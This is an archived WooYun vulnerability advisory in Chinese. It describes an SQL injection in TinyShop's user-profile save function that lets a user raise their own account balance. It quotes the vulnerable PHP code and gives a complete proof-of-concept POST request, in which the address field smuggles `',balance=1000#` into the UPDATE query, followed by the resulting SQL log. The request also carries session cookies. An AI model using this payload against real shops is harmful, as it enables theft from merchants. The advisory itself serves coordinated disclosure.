当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074894

漏洞标题:Tinyshop刷钱漏洞

相关厂商:tinyrise.com

漏洞作者: magerx

提交时间:2014-09-03 15:38

修复时间:2014-12-02 15:40

公开时间:2014-12-02 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-03: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向第三方安全合作伙伴开放
2014-10-28: 细节向核心白帽子及相关领域专家公开
2014-11-07: 细节向普通白帽子公开
2014-11-17: 细节向实习白帽子公开
2014-12-02: 细节向公众公开

简要描述:

听说通用型给力了,来测试下

详细说明:

之前看到一个它的刷钱漏洞,不过补了,后来一看还是可以。。,只修复之前的post覆盖data数组
/protected/controllers/ucenter.php,393行

public function info_save()
{
$rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择!','birthday:date:生日日期格式不正确!','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确');
$info = Validator::check($rules);
if(is_array($info)){
$this->redirect("info",false,array('msg'=>array("info",$info['msg'])));
}else{
$data = array(
'name'=>Filter::str(Req::args('name')),
'real_name'=>Filter::str(Req::args('real_name')),
'sex'=>Filter::int(Req::args('sex')),
'birthday'=>Req::args('birthday'),
'mobile'=>Req::args('mobile'),
'phone'=>Req::args('phone'),
'province'=>Req::args('province'),
'city'=>Req::args('city'),
'county'=>Req::args('county'),
'addr'=>Filter::text(Req::args('addr'))
);
}
$name = Filter::sql(Req::args("name"));
$id = $this->user['id'];
$this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();
$this->model->table("customer")->data($data)->where("user_id=$id")->update();
$obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
$this->safebox->set('user',$obj,$this->cookie_time);
$this->redirect("info");
}


从上面来看以下地方的过滤都是有问题的

'birthday'=>Req::args('birthday'),
'mobile'=>Req::args('mobile'),
'phone'=>Req::args('phone'),
'province'=>Req::args('province'),
'city'=>Req::args('city'),
'county'=>Req::args('county'),
'addr'=>Filter::text(Req::args('addr'))


导致可以注入,但是我们并不关心这个,因为用户账户余额的字段banlance也是在这个表中,所以我们可以通过update操作给自己刷钱,而不是用这个注入来盲注。

漏洞证明:

poc:

POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/tinyshop/index.php?con=ucenter&act=info
Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#


SQL查询日志:

187323 Query       update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4


看看结果:

tinyshop_1.jpg

修复方案:

版权声明:转载请注明来源 magerx@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-09-03 23:30

厂商回复:

非常感谢您为TinyShop信息安全做的贡献,
此处问题,由多个原因引起,多个提交者都是说的这里,我们会尽快一并修复,非常感谢您的支持。

最新状态:

暂无


漏洞评价:

评论